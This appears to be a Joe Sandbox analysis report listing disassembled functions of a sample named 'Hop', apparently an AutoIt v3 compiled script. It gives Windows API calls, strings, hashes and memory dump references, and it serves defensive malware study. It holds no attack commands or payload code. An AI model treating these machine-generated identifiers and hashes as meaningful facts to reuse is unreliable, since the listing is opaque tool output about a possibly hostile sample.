                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                          • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                                                                                                                                                                                                                          • Instruction ID: 448349826376e5b0a885c54ed260e8c65e8d8861f902338aa3409293b53125b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0513731E0C647C5FF209B24E9946B82AA1BFE9B48F44513DD48DC3AA2CF6DB594C741
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46D394 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                                                                          • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 44ac8ad2ca971f025b02e99b2e2281e48f43b1f569d8acb1ff9e121f0d45ef59
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F417972A0AF45C9FB54CB25E841BA933A4FF18398F41413AEA5C87B98DE3DD4A5C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4A7CB0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000001,00007FF68C47BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D), ref: 00007FF68C4A7CE6
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D,?,00007FF68C433C00), ref: 00007FF68C4A7D00
                                                                                                                                                                                                                                                                                                          • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF68C4A7D43
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D,?,00007FF68C433C00), ref: 00007FF68C4A7DD7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                          • API String ID: 4007322891-4153970271
                                                                                                                                                                                                                                                                                                          • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                                                                                                                                                                                                                          • Instruction ID: b3b253893b6eb1a4754a3ff8339c5d780751f8490dc57ebd8ed82f22ab429419
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15317E72A18A82D1DB10DB24E854AED6361FF84B98F80403AEA4DC7799DF3CE589C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C433EF8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 2914291525-2659433951
                                                                                                                                                                                                                                                                                                          • Opcode ID: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 509b1d64857da9b4f42365db323a85079ca7e7bf54167e5bd884a3197635fff0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1310472A09B41CAEB40CF60E8943A837B4FF98758F140139DA9D97B64CF7C9198CB80
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E14FC Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E156E
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E157F
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E158C
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16C3
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16E1
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16F6
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E1731
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E177C
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32 ref: 00007FF68C4E17B3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4E02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF68C47A2D7), ref: 00007FF68C4E036D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4E02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF68C47A2D7), ref: 00007FF68C4E037A
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E17EA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2672075419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 795f6bd47959c17e1430282d9e12aeab43bf7eefcd37e3788b34edfc2f2b71c8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17915E76F49616CAEB90CF66D4446BD33A1BF88BACF150039DE0E97696DE38E485C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C439924 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 435COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C43780C: CreateFileW.KERNEL32 ref: 00007FF68C437876
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4541D0: GetCurrentDirectoryW.KERNEL32(?,00007FF68C4399C7), ref: 00007FF68C4541EC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C435A50: GetFullPathNameW.KERNEL32(?,00007FF68C435A3D,?,00007FF68C434C50,?,?,?,00007FF68C43109E), ref: 00007FF68C435A7B
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF68C439A60
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF68C439BA0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                                                                                                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                                                                                                          • API String ID: 2207129308-3738523708
                                                                                                                                                                                                                                                                                                          • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4bd517193a4bc037ac5dc51fc5fa203012bbc8c99146d7f6d9c18d4e5388d3a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4127122A18642C6EB10EB65D4405FE6770FFD479CF90413AEA8E87A9ADF7CD585CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C438248 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 289comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                                                                                                                                          • API String ID: 1992507300-3243417748
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 517b8fb5c34b3fb3fd06b63ae5d221ebf36bec842ad23c168f846c47594ffd6c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D14022B09A06C1EE54DF26C5906BC6360BFD4B99F54403ADB0E97692DF3CE8E2D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4C7FD8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1765764032
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                                                                                                                                                                                                                          • Instruction ID: c1e6ab4c0ee87cf6a3f425a3c1aa82a8f73254b040844a9cb46857a2195b09ac
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91A14A36A08B42C6EB20CF61E4445AD77A0FF88B98F55413ADA4E87B65DF3CE589C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DABC4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                                                                                                                                                                                                          • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                          • API String ID: 2361508679-3975388722
                                                                                                                                                                                                                                                                                                          • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                                                                                                                                                                                                                          • Instruction ID: 643c32e5b901fde592fb1e49369cd669790f0273d7596c5c867c8a59f54be1e5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C351B032A04781CAE720CF25E8446D933A5FF88798F40413AEE4C87B55DF79D695CB40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C433CEC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D06
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D16
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D2B
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D44
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D5D
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00007FF68C433D89
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32 ref: 00007FF68C433DED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: GetSysColorBrush.USER32 ref: 00007FF68C433F4D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: RegisterClassExW.USER32 ref: 00007FF68C433F7E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: RegisterWindowMessageW.USER32 ref: 00007FF68C433F92
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF68C433FB0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: ImageList_Create.COMCTL32 ref: 00007FF68C433FCB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: LoadIconW.USER32 ref: 00007FF68C433FE4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF68C433FF7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3
                                                                                                                                                                                                                                                                                                          • API String ID: 423443420-1704141276
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                                                                                                                                                                                                                          • Instruction ID: a62dfbc6c55117739543e05ed8e9187c0289b35e379a7496f6f41b2b209ec339
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4331F536A09B02C6EB00CB61F8943A933B4BF98768F144139D94D97B64DF7DE0A5C741
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4771D8 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
